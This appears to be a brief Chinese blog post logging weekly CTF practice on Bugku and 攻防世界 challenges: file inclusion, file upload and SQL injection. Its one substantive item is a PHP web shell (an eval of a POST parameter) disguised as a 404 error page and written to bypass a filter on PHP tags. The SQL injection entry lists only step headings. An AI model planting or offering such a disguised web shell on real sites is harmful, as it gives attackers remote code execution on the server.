周练2

1.bugku文件包含2

 

 

 

发现上传点

发现<%php %>被屏蔽了。

 

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title> 
<script language="pHp">
  @eval($_POST['ant'])

  </script>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

 

https://blog.csdn.net/weixin_45588247/article/details/119177948?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&utm_relevant_index=2

 

 

2.攻防世界之upload1

1.

2.

 

 

 

3.攻防世界 - NewsCenter

1.测试注入点

2.检查回显

3.查库

4. 查表

5. 查列

6.打印数据

 

 

4.bugku 文件上传

 

 

 

 

 

 

posted @ 2022-04-16 14:04  mayylu  阅读(24)  评论(0编辑  收藏  举报